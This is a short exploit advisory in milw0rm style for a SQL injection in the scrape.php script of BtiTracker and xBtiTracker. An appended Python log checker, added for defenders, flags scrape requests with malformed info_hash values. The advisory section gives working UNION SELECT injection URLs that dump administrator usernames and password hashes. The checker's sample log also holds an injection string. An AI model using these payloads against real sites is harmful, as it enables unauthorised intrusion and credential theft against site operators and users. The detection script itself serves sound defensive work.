## BtiTracker/xBtiTracker Remote SQL Injection Vulnerability
## Author: InATeam (http://inattack.ru/)
## Affected versions: BtiTracker <= 1.4.7, xBtiTracker <= 2.0.542
## Software site: http://www.btiteam.org/
##
## ==============================================================================
## Exploit:
## ==============================================================================
## http://site/scrape.php?info_hash=1%27)
## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0
## +FROM+users+WHERE+id_level=8/*
## ==============================================================================
## for xBtiTracker we need to specify prefix:
## ==============================================================================
## http://site/scrape.php?info_hash=1%27)
## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0
## +FROM+xbtit_users+WHERE+id_level=8/*
## ==============================================================================

# milw0rm.com [2008-08-25]
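
Added example, not part of the original advisory: a log check a defender can run for the requests shown above. It assumes the BitTorrent scrape convention that info_hash is a URL-encoded 20-byte SHA-1 value, and flags scrape.php requests whose info_hash decodes to any other length; the log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Client address and request target from a combined-format access log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP ranges), not from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Aug/2008:10:00:01 +0000] "GET /scrape.php?info_hash='
    '%12%34%56%78%9A%BC%DE%F0%12%34%56%78%9A%BC%DE%F0%12%34%56%78 HTTP/1.1" 200 96',
    '198.51.100.7 - - [25/Aug/2008:10:00:05 +0000] "GET /scrape.php?info_hash='
    '1%27)+UNION+SELECT+0,0,0,0/* HTTP/1.1" 200 512',
    '192.0.2.44 - - [25/Aug/2008:10:00:09 +0000] "GET /index.php?page=torrents '
    'HTTP/1.1" 200 2048',
]

def info_hashes(target):
    """Return every info_hash value in a request target as raw bytes."""
    values = []
    for pair in urlsplit(target).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "info_hash":
            # '+' is a form-encoded space; decode to bytes so binary hashes survive.
            values.append(unquote_to_bytes(value.replace("+", " ")))
    return values

def suspicious_scrapes(lines):
    """Return (client, decoded value) for scrape requests with a non-20-byte info_hash."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        if not urlsplit(target).path.endswith("/scrape.php"):
            continue
        for value in info_hashes(target):
            if len(value) != 20:  # assumption: a valid info_hash is a 20-byte SHA-1
                hits.append((client, value))
    return hits

if __name__ == "__main__":
    for client, value in suspicious_scrapes(SAMPLE_LOG):
        print(f"{client}: malformed info_hash {value!r}")
```

The length check is a detection heuristic only: the query behind scrape.php still needs escaping or parameter binding, because a 20-byte value can itself contain a quote character.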